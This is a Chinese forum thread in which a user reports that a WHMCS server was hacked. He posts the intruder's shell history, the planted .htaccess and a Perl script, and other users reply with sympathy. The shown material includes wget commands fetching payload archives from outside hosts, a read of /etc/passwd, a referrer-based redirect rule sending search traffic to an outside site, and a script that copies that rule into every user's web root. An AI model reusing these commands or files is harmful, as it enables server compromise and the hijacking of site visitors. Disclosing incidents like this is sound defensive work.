中招了,whmcs被黑

老T · 发表于 2012-1-8 20:49:15

本帖最后由老T 于 2012-1-8 21:06 编辑
[ol]

124 id

125 ls /etc/valiases

126 chomd 777 valiases

127 pwd

128 cd /home2/multi/public_html/

129 cd..

130 cat /etc/passwd

131 root:x:0:0:root:/root:/bin/bash

132 bin:x:1:1:bin:/bin:/sbin/nologin

133 daemon:x:2:2:daemon:/sbin:/sbin/nologin

134 adm:x:3:4:adm:/var/adm:/sbin/nologin

135 lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

136 sync:x:5:0:sync:/sbin:/bin/sync

137 shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

138 halt:x:7:0:halt:/sbin:/sbin/halt

139 mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

140 uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

141 operator:x:11:0:operator:/root:/sbin/nologin

142 games:x:12:100:games:/usr/games:/sbin/nologin

143 gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

144 ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

145 nobody:x:99:99:Nobody:/:/sbin/nologin

146 vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

147 sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

148 ntp:x:38:38::/etc/ntp:/sbin/nologin

149 mysql:x:500:500::/home/mysql:/sbin/nologin

150 www:x:501:501::/home/www:/sbin/nologin

151 saslauth:x:499:499:"Saslauthd user":/var/empty/saslauth:/sbin/nologin

152 mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin

153 smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin

154 root:x:0:0:root:/root:/bin/bash

155 bin:x:1:1:bin:/bin:/sbin/nologin

156 daemon:x:2:2:daemon:/sbin:/sbin/nologin

157 adm:x:3:4:adm:/var/adm:/sbin/nologin

158 lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

159 sync:x:5:0:sync:/sbin:/bin/sync

160 shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

161 halt:x:7:0:halt:/sbin:/sbin/halt

162 mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

163 uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

164 operator:x:11:0:operator:/root:/sbin/nologin

165 games:x:12:100:games:/usr/games:/sbin/nologin

166 gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

167 ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

168 nobody:x:99:99:Nobody:/:/sbin/nologin

169 vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

170 sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

171 ntp:x:38:38::/etc/ntp:/sbin/nologin

172 mysql:x:500:500::/home/mysql:/sbin/nologin

173 www:x:501:501::/home/www:/sbin/nologin

174 saslauth:x:499:499:"Saslauthd user":/var/empty/saslauth:/sbin/nologin

175 mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin

176 smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin

177 wget http://www.undp.org.sz/images/M_images/0.zip

178 unzip 0.zip

179 wget http://www.floraria-ariana.ro//tmp/htaccess.zip

180 wget http://www.floraria-ariana.ro//htaccess.zip

181 unzip htaccess.zip

182 perl 0.pl

183 pwd

184 cd /home/

185 ls

186 cd www

187 ls

188 cd ..

189 cd wwwroot

190 ls

191 cd xxx.xxx.xx

192 wget http://www.smiv.com.ve/logs/pic.zip

193 unzip pic.zip

[/ol]复制代码[ol]

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.* [OR]

RewriteCond %{HTTP_REFERER} .*ask.* [OR]

RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]

RewriteCond %{HTTP_REFERER} .*baidu.* [OR]

RewriteCond %{HTTP_REFERER} .*有图比.* [OR]

RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]

RewriteCond %{HTTP_REFERER} .*qq.* [OR]

RewriteCond %{HTTP_REFERER} .*excite.* [OR]

RewriteCond %{HTTP_REFERER} .*altavista.* [OR]

RewriteCond %{HTTP_REFERER} .*msn.* [OR]

RewriteCond %{HTTP_REFERER} .*netscape.* [OR]

RewriteCond %{HTTP_REFERER} .*aol.* [OR]

RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]

RewriteCond %{HTTP_REFERER} .*goto.* [OR]

RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]

RewriteCond %{HTTP_REFERER} .*mamma.* [OR]

RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]

RewriteCond %{HTTP_REFERER} .*lycos.* [OR]

RewriteCond %{HTTP_REFERER} .*search.* [OR]

RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]

RewriteCond %{HTTP_REFERER} .*bing.* [OR]

RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]

RewriteCond %{HTTP_REFERER} .*FB.* [OR]

RewriteCond %{HTTP_REFERER} .*推特.* [OR]

RewriteCond %{HTTP_REFERER} .*blog.* [OR]

RewriteCond %{HTTP_REFERER} .*live.* [OR]

RewriteCond %{HTTP_REFERER} .*myspace.* [OR]

RewriteCond %{HTTP_REFERER} .*mail.* [OR]

RewriteCond %{HTTP_REFERER} .*yandex.* [OR]

RewriteCond %{HTTP_REFERER} .*rambler.* [OR]

RewriteCond %{HTTP_REFERER} .*ya.* [OR]

RewriteCond %{HTTP_REFERER} .*aport.* [OR]

RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]

RewriteCond %{HTTP_REFERER} .*flickr.*

RewriteRule ^(.*)$ http://ulitka.kh.ua/vb/showthread.php [R=permanent,L][/ol]复制代码[ol]

#!/usr/bin/perl

# Exploit tool v1.0 Coded L3y Black Dream(Modify By s3f4)

# Valid Exploits For Linux Servers ...

# [ LocalKernel.Com ]

# Let's Start ...

{

system("cp .htaccess /home/daemon/public_html/.htaccess");

system("cp .htaccess /home/adm/public_html/.htaccess");

system("cp .htaccess /home/lp/public_html/.htaccess");

system("cp .htaccess /home/sync/public_html/.htaccess");

system("cp .htaccess /home/shutdown/public_html/.htaccess");

system("cp .htaccess /home/halt/public_html/.htaccess");

system("cp .htaccess /home/mail/public_html/.htaccess");

system("cp .htaccess /home/uucp/public_html/.htaccess");

system("cp .htaccess /home/operator/public_html/.htaccess");

system("cp .htaccess /home/games/public_html/.htaccess");

system("cp .htaccess /home/gopher/public_html/.htaccess");

system("cp .htaccess /home/ftp/public_html/.htaccess");

system("cp .htaccess /home/nobody/public_html/.htaccess");

system("cp .htaccess /home/vcsa/public_html/.htaccess");

system("cp .htaccess /home/sshd/public_html/.htaccess");

system("cp .htaccess /home/ntp/public_html/.htaccess");

system("cp .htaccess /home/mysql/public_html/.htaccess");

system("cp .htaccess /home/www/public_html/.htaccess");

system("cp .htaccess /home/saslauth/public_html/.htaccess");

system("cp .htaccess /home/mailnull/public_html/.htaccess");

system("cp .htaccess /home/smmsp/public_html/.htaccess");

print "[ sefa [AT] google [DOT] tk ^ LocalKernel.Com]";

}[/ol]复制代码

汉陈帝国 · 发表于 2012-1-8 20:49:50

恭喜

我是马甲撒 · 发表于 2012-1-8 20:49:54

同情，悲催

whhuazi · 发表于 2012-1-8 20:49:56

楼主，赶紧~

lazyzhu · 发表于 2012-1-8 20:50:22

同情

oldghost · 发表于 2012-1-8 20:50:27

杯具

master · 发表于 2012-1-8 20:50:35

Kvm · 发表于 2012-1-8 20:50:41

wget http://www.smiv.com.ve/logs/pic.zip
我是不是知道得太多了

bearqq · 发表于 2012-1-8 20:59:06

bearqq 发表于 2012-1-8 13:59

wget http://www.smiv.com.ve/logs/pic.zip
我是不是知道得太多了
绝对是

看不懂

白日梦 · 发表于 2012-1-8 21:00:51

恭喜！！

		自动登录	找回密码
密码			立即注册